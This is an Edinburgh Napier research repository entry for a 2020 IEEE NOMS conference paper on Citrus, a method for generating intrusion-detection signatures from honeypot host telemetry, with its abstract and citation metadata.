Ryan Mills
Citrus: Orchestrating Security Mechanisms via Adversarial Deception
Mills, Ryan; Race, Nicholas; Broadbent, Matthew
Authors
Nicholas Race
Matthew Broadbent
Abstract
Despite the Internet being an apex of human achievement for many years, malicious activity and cyber attacks are becoming more prevalent than ever before. Large scale data collection using threat sources such as honeypots have recently been employed to gather information relating to these attacks. While this data naturally details attack properties, there exists challenges in extracting the relevant information from vast data sets to provide valuable insight and a standard description of the attack. Traditionally, threats are identified through the use of signatures that are crafted manually through the composition of IOCs (Indicators of Compromise) extracted from telemetry captured during an attack process, which is often administered by an experienced engineer. These signatures have been proven effective in their use by IDSs (Intrusion Detection Systems) to detect emerging threats. However, little research has been made in automating the extraction of emerging IOCs and the generation of corresponding signatures which incorporate host artefacts. In this paper we present Citrus: a novel approach to the generation of signatures by incorporating host based telemetry extracted from honeypot endpoints. Leveraging this visibility at an endpoint grants a detailed understanding of bleeding edge attack tactics, techniques, and procedures gathered from host logs.
Citation
Mills, R., Race, N., & Broadbent, M. (2020, April). Citrus: Orchestrating Security Mechanisms via Adversarial Deception. Presented at NOMS 2020 - 2020 IEEE/IFIP Network Operations and Management Symposium, Budapest, Hungary
Presentation Conference Type | Conference Paper (published) |
---|---|
Conference Name | NOMS 2020 - 2020 IEEE/IFIP Network Operations and Management Symposium |
Start Date | Apr 20, 2020 |
End Date | Apr 24, 2020 |
Online Publication Date | Jun 8, 2020 |
Publication Date | 2020 |
Deposit Date | Mar 8, 2022 |
Publisher | Institute of Electrical and Electronics Engineers |
Series ISSN | 2374-9709 |
Book Title | NOMS 2020-2020 IEEE/IFIP Network Operations and Management Symposium |
DOI | https://doi.org/10.1109/NOMS47738.2020.9110443 |
Public URL | http://researchrepository.napier.ac.uk/Output/2844089 |
Downloadable Citations
About Edinburgh Napier Research Repository
Administrator e-mail: repository@napier.ac.uk
This application uses the following open-source libraries:
SheetJS Community Edition
Apache License Version 2.0 (http://www.apache.org/licenses/)
PDF.js
Apache License Version 2.0 (http://www.apache.org/licenses/)
Font Awesome
SIL OFL 1.1 (http://scripts.sil.org/OFL)
MIT License (http://opensource.org/licenses/mit-license.html)
CC BY 3.0 ( http://creativecommons.org/licenses/by/3.0/)
Powered by Worktribe © 2025
Advanced Search